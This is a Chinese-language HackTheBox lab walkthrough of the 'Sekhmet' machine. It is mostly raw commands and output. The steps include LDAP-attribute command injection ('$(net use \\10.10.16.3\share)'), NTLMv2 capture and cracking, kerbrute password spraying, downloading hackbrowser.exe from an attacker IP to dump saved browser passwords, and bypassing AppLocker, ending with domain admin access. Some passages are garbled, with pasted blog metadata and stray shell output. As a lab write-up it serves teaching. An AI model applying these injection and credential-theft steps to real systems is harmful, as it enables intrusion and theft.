smb: > ls
. D 0 Mon May 2 18:33:07 2022
.. DHS 0 Tue Apr 18 12:34:13 2023
temp D 0 Tue Apr 18 17:04:44 2023
9801727 blocks of size 4096. 3492465 blocks available
smb: > cd temp
smb: temp> ls
. D 0 Tue Apr 18 17:04:44 2023
.. D 0 Mon May 2 18:33:07 2022
debug-users.txt A 88 Tue Apr 18 17:04:44 2023
9801727 blocks of size 4096. 3492449 blocks available
smb: temp> get debug-users.txt
getting file tempdebug-users.txt of size 88 as debug-users.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: temp>
里边看起来像是串密码:
$ cat debug-users.txt
IvanJennings43235345
MiriamMills93827637
BenjaminHernandez23232323
RayDuncan9342211
在另一个登陆脚本里,有一些文件:
$ proxychains smbclient -k //hope.windcorp.htb/NETLOGON
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
WARNING: The option -k|--kerberos is deprecated!
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Mon May 2 15:49:18 2022
.. D 0 Tue Apr 26 04:59:55 2022
form.ps1 A 2124 Mon May 2 14:47:14 2022
Update phone.lnk A 2710 Mon May 2 14:37:33 2022
windcorp-logo.png A 47774 Mon May 2 05:45:04 2022
9801727 blocks of size 4096. 3492209 blocks available
smb: >
$ cat form.ps1
#Create Objects
$SysInfo = New-Object -ComObject "ADSystemInfo"
$UserDN = $SysInfo.GetType().InvokeMember("UserName","GetProperty", $Null, $SysInfo, $Null)
$User = [adsi]"LDAP://$($UserDN)"
#Create form
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
$form = New-Object System.Windows.Forms.Form
$form.Text = 'SMS password reset setup'
$form.Size = New-Object System.Drawing.Size(300,200)
$form.StartPosition = 'CenterScreen'
$okButton = New-Object System.Windows.Forms.Button
$okButton.Location = New-Object System.Drawing.Point(75,120)
$okButton.Size = New-Object System.Drawing.Size(75,23)
$okButton.Text = 'OK'
$okButton.DialogResult = [System.Windows.Forms.DialogResult]::OK
$form.AcceptButton = $okButton
$form.Controls.Add($okButton)
$cancelButton = New-Object System.Windows.Forms.Button
$cancelButton.Location = New-Object System.Drawing.Point(150,120)
$cancelButton.Size = New-Object System.Drawing.Size(75,23)
$cancelButton.Text = 'Cancel'
$cancelButton.DialogResult = [System.Windows.Forms.DialogResult]::Cancel
$form.CancelButton = $cancelButton
$form.Controls.Add($cancelButton)
$label = New-Object System.Windows.Forms.Label
$label.Location = New-Object System.Drawing.Point(10,20)
$label.Size = New-Object System.Drawing.Size(280,20)
$label.Text = 'To be able to reset password using SMS,'
$form.Controls.Add($label)
$label = New-Object System.Windows.Forms.Label
$label.Location = New-Object System.Drawing.Point(10,40)
$label.Size = New-Object System.Drawing.Size(280,20)
$label.Text = ' you need to keep it updated:'
$form.Controls.Add($label)
$textBox = New-Object System.Windows.Forms.TextBox
$textBox.Location = New-Object System.Drawing.Point(10,60)
$textBox.Size = New-Object System.Drawing.Size(260,20)
$form.Controls.Add($textBox)
$textBox.Text = $User.Get("mobile")
$form.Topmost = $true
$form.Add_Shown({$textBox.Select()})
$result = $form.ShowDialog()
if ($result -eq [System.Windows.Forms.DialogResult]::OK)
{
$x = $textBox.Text
$User.Put("mobile",$x)
$User.SetInfo()
}
看起来是个什么表单输入框。使用LDAP查询信息:
ldapsearch -LLLY GSSAPI -H ldap://windcorp.htb -b 'DC=windcorp,DC=htb' > ldapinfo.txt
在LDAP返回的数据中,有包含用户的手机号:
dn: CN=Ivan Jennings,OU=HR,DC=windcorp,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ivan Jennings
sn: Jennings
givenName: Ivan
distinguishedName: CN=Ivan Jennings,OU=HR,DC=windcorp,DC=htb
instanceType: 4
whenCreated: 20220430082007.0Z
whenChanged: 20220502100306.0Z
uSNCreated: 124122
memberOf: CN=HR,OU=Groups,DC=windcorp,DC=htb
uSNChanged: 156439
name: Ivan Jennings
objectGUID:: mdfR8c5+CUaV6LoVzJ9v1Q==
userAccountControl: 512
badPwdCount: 1
codePage: 0
countryCode: 0
badPasswordTime: 132959946984632757
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132957804073532966
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAE97tbUcM4vF/kEqjpgoAAA==
accountExpires: 9223372036854775807
logonCount: 0 root
root@webserver:~# ls
user.txt
root@webserver:~# cat user.txt
a50c8.......................
sAMAccountName: Ivan.Jennings
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=windcorp,DC=htb
dSCorePropagationData: 16010101000000.0Z
mobile: 43235345
跟在SMB共享目录中的信息是一样的,或许是有个脚本或是任务在将用户的手机号读取并写入SMB共享目录中的debug-user.txt中,或许我可以尝试更改mobile的值,
echo -e 'dn: CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTBnchangetype: modifynreplace: mobilenmobile: $(whoami)' | ldapmodify -H ldap://hope.windcorp.htb
这条指令是用于LDAP目录中修改某个用户的手机号码(mobile)字段,将其修改成"$(ping 10.10.14.6)"。具体而言,这个修改操作包含两个部分:
具体而言,该命令包含三个部分:
-
dn: CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB:表示要修改的对象的唯一标识符(Distinguished Name),即"CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB"。 -
changetype: modify, replace: mobile, mobile: (whoami):在这次修改中,要替换掉字段的旧值(如果有),使用新值"(whoami): -
通过ldapmodify指令对LDAP服务器进行操作,使用的协议为LDAP(ldap://hope.windcorp.htb)。
然后再去查看SMB中的DEBUG-USERS.txt
$ cat debug-users.txt
IvanJennings43235345
MiriamMills93827637
BenjaminHernandez23232323
RayDuncanwindcorpscriptrunner
看起来是可以命令注入的,直接看能否抓到NTLMv2:
echo -e 'dn: CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTBnchangetype: modifynreplace: mobilenmobile: $(net use \\10.10.16.3\share)' | ldapmodify -H ldap://hope.windcorp.htb
没有,目标似乎不出网。
https://github.com/ropnop/impacket_static_binaries/releases
投放个SMBSERVER:
echo -e 'dn: CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTBnchangetype: modifynreplace: mobilenmobile: $(net use \\webserver.windcorp.htb\share)' | ldapmodify -H ldap://hope.windcorp.htb
root@webserver:~# ./smbserver share . -smb2support
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,58190)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] AUTHENTICATE_MESSAGE (WINDCORPscriptrunner,HOPE)
[*] User HOPEscriptrunner authenticated successfully
[*] scriptrunner::WINDCORP:4141414141414141:5fb69b1d2c51fcc5bb86b03f33a0bc3c:01010000000000000093eeff6c72d9012709496fba7d99cc000000000100100045006e004b005500470066006c004c0002001000750041004e007400540056006a0058000300100045006e004b005500470066006c004c0004001000750041004e007400540056006a005800070008000093eeff6c72d90106000400020000000800300030000000000000000000000000210000c7d650d6ddcbb49f5e454b697636ef77fe1cf0011327e2afa6c8b9c18d086c8a0a001000000000000000000000000000000000000900360063006900660073002f007700650062007300650072007600650072002e00770069006e00640063006f00720070002e006800740062000000000000000000
$ john hash1 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@p%i&J#iNNo1T2 (scriptrunner)
1g 0:00:00:02 DONE (2023-04-19 11:14) 0.5000g/s 7171Kp/s 7171Kc/s 7171KC/s "chinor23"..*7¡Vamos!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
webster@webserver:~$ ksu
account root: authorization failed
webster@webserver:~$ kinit ray.duncan
Password for [email protected]:
webster@webserver:~$ ksu
Authenticated [email protected]
Account root: authorization for [email protected] successful
Changing uid to root (0)
<b\share)' | ldapmodify -H ldap://hope.windcorp.htb
SASL/GSS-SPNEGO authentication started
SASL username: [email protected]
SASL SSF: 256
SASL data security layer installed.
modifying entry "CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB"
root@webserver:/home/webster#
得到个密码,使用ldapsearch查询用户:
ldapsearch -H ldap://hope.windcorp.htb -b "DC=WINDCORP,DC=HTB" sAMAccountName "CN=Users,DC=windcorp,DC=HTB" | grep sAMAccountName | awk '{print $2}' > domainusers
然后上传个kerbrute:
./kerbrute passwordspray -d windcorp.htb domainusers '!@p%i&J#iNNo1T2'
发现两个用户:
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/19/23 - Ronnie Flathers @ropnop
2023/04/19 05:57:10 > Using KDC(s):
2023/04/19 05:57:10 > hope.windcorp.htb:88
2023/04/19 05:57:11 > [+] VALID LOGIN: [email protected]:!@p%i&J#iNNo1T2
2023/04/19 05:57:16 > [+] VALID LOGIN: [email protected]:!@p%i&J#iNNo1T2
2023/04/19 05:57:16 > Done! Tested 597 logins (2 successes) in 6.410 seconds
root@webserver:~#
scriptrunner用户不能登陆,但是Bob.Wood可以:
$ proxychains kinit bob.wood
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Password for [email protected]:
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
$ proxychains evil-winrm -i hope.windcorp.htb -r windcorp.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completiontitle: HTB Walkthrough Active
layout: true
categories: HackTheBox
tags:
- Active Directory
cover: https://raw.githubusercontent.com/Crazyinside/blog.image/main/material/wallhaven-d5xolg_1920x1080.png
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
*Evil-WinRM* PS C:UsersBob.WoodDocuments>
Get Administrator
Bob.Wood是IT管理员,不是域管理员:
*Evil-WinRM* PS C:UsersBob.WoodDocuments> net user Bob.Wood
User name Bob.Wood
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/2/2022 12:42:15 PM
Password expires Never
Password changeable 5/3/2022 12:42:15 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/19/2023 6:00:11 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Adminusers *IT
*Domain Users
The command completed successfully.
但是还有一个Bob.Woodadm是在域管理员组里的:
*Evil-WinRM*net user bob.woodadmodDocuments>
User name bob.woodadm
Full Name Bob Wood - Admin
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/4/2022 7:43:11 PM
Password expires Never
Password changeable 5/5/2022 7:43:11 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Protected Users *Domain Admins
*Domain Users
The command completed successfully.
可能会存在密码复用的问题,但是当前的密码不是,或许计算机某处还保留了该用户的其他密码,尝试利用hackbrowser.exe抓密码,会告警APPLocaker:
*Evil-WinRM* PS C:programdata> iwr http://10.10.16.3/hackbrowser.exe -outfile m.exe
*Evil-WinRM* PS C:UsersBob.WoodDocuments> .m.exe
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
Program 'm.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ .m.exe
+ ~~~~~~~.
At line:1 char:1
+ .m.exe
+ ~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
malloc_consolidate(): unaligned fastbin chunk detected
zsh: IOT instruction (core dumped) proxychains evil-winrm -i hope.windcorp.htb -r windcorp.htb
查找非Applocker限制目录:
*Evil-WinRM* PS C:UsersBob.WoodDocuments> cp m.exe c:windowsdebugwia
*Evil-WinRM* PS C:UsersBob.WoodDocuments> cd c:windowsdebugwia
*Evil-WinRM* PS C:windowsdebugwia> ls
Directory: C:windowsdebugwia
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/19/2023 6:30 AM 8162816 m.exe
-a---- 5/1/2022 11:45 PM 3291 wiatrace.log
*Evil-WinRM* PS C:windowsdebugwia> .m.exe
[NOTICE] [browser.go:47,pickChromium] find browser Chromium failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser OperaGX failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Brave failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Yandex failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser 360speed failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser QQ failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Chrome failed, profile folder does not exist
[NOTICE] [browser.go:51,pickChromium] find browser Microsoft Edge success
[NOTICE] [browser.go:53,pickChromium] find browser microsoft_edge_default success
[NOTICE] [browser.go:47,pickChromium] find browser Vivaldi failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser CocCoc failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Chrome Beta failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Opera failed, profile folder does not exist
[NOTICE] [browser.go:91,pickFirefox] find browser firefox Firefox failed, profile folder does not exist
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_cookie.csv success
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_localstorage.csv success
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_history.csv success
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_download.csv success
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_password.csv success
*Evil-WinRM* PS C:windowsdebugwia>
*Evil-WinRM* PS C:windowsdebugwia> cd results
*Evil-WinRM* PS C:windowsdebugwiaresults> ls
Directory: C:windowsdebugwiaresults
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/19/2023 6:42 AM 12818 microsoft_edge_default_cookie.csv
-a---- 4/19/2023 6:42 AM 229 microsoft_edge_default_download.csv
-a---- 4/19/2023 6:42 AM 1096 microsoft_edge_default_history.csv
-a---- 4/19/2023 6:42 AM 10130 microsoft_edge_default_localstorage.csv
-a---- 4/19/2023 6:42 AM 373 microsoft_edge_default_password.csv
*Evil-WinRM* PS C:windowsdebugwiaresults>
*Evil-WinRM* PS C:windowsdebugwiaresults> cat microsoft_edge_default_password.csv
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
UserName,Password,LoginURL,CreateDate
[email protected],smeT-Worg-wer-m024,http://webmail.windcorp.com/login.html,2022-05-04T18:46:59.133335+02:00
[email protected],SomeSecurePasswordIGuess!09,http://google.com/login.html,2022-05-04T18:14:00.217981+02:00
[email protected],SemTro¤32756Gff,http://somewhere.com/login.html,2022-05-04T18:12:42.849216+02:00
malloc_consolidate(): unaligned fastbin chunk detected
用smeT-Worg-wer-m024请求票据:
$ proxychains kinit bob.woodADM
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Password for [email protected]:
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
$ proxychains evil-winrm -i hope.windcorp.htb -r windcorp.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
*Evil-WinRM* PS C:Usersbob.woodadmDocuments>
获取root.txt:
$ proxychains evil-winrm -i hope.windcorp.htb -r windcorp.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
*Evil-WinRM* PS C:Usersbob.woodadmDocuments> cd ../desktop
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
*Evil-WinRM* PS C:Usersbob.woodadmdesktop> ls
*Evil-WinRM* PS C:Usersbob.woodadmdesktop> cd ..
*Evil-WinRM* PS C:Usersbob.woodadm> cd ..
*Evil-WinRM* PS C:Users> cd administrator
*Evil-WinRM* PS C:Usersadministrator> cd desktop
*Evil-WinRM* PS C:Usersadministratordesktop> ls
Directory: C:Usersadministratordesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/19/2023 5:02 AM 34 root.txt
*Evil-WinRM* PS C:Usersadministratordesktop> type root.txt
原文始发于微信公众号(老鑫安全):HTB Walkthrough Sekhmet
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论